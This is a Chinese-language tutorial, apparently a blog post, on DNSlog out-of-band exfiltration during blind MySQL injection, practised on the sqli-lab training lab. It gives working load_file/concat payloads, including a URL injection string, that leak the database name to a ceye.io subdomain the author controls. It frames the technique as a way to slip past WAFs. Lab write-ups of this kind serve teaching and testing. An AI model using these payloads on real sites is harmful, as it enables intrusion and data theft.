使用原因:
在进行盲注的时候,因为需要频繁发送访问请求,有的网站配置了waf就有可能让我们的注入受阻。所以用DNSlog外带可以减少请求并且直接回显数据,真的是绝绝子,好用到跺jiojio。
什么是DNS:
DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址
什么是DNSlog:
DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录
DNSlog外带原理:
DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到自己这里,然后通过读日志获取信息。
使用步骤:
1、由于我们要用的MySQL的load_file函数发送请求,所以需要提前配置一下我们的my.ini文件。
打开my.ini文件,添加secure_file_priv参数,并且置空,然后登陆mysql查看设置,命令如下:
show variables like '%secure%'
发现成功置空。
该参数的值的含义如下:
当secure_file_priv为空,就可以读取任意文件
当secure_file_priv为特定的某个位置,那么就只能读取该位置的文件,如"D:"
当secure_file_priv为NULL,load_file函数就不能加载文件。
2、在ceye.io注册域名进行DNSlog外带的尝试,注册完后获得域名,使用sql语句尝试访问,然后去到DNS Query那里查看请求是否接收
3、上面基本证明了DNSlog是可以显示出信息的,那么接下来就让我们看一下是怎么外带出信息的,首先我们先创造一个test库,然后进行查询,结果如下:
查询语句如下:
select load_file(concat('\\',(select database()),'.yxllh9.ceye.io\abc'));
这里用concat拼接字符。
4、既然上面都行得通,那么就该思考如何用在靶场上了,其实简单的换一下注入的方式就可以了,这里我用的是sqli-lab里面的lesson1,是一个很简单的错误注入题,我们换一下注入的方式,注入代码如下:
?id=1' and (select load_file(concat('\\',(select database()),'.yxllh9.ceye.io\abc')))#
这个样子当然是没有回显的,但是当我们查看DNSlog的时候就能发现我们需要的payload了。
哈哈,感觉有趣又好用,DNSlog外带yyds啊
忘了说了,还有查表名和字段名,这两点其实和之前在联合查询里面讲的基本一样,不过要注意limit一下,因为load_file只能读取一个目录
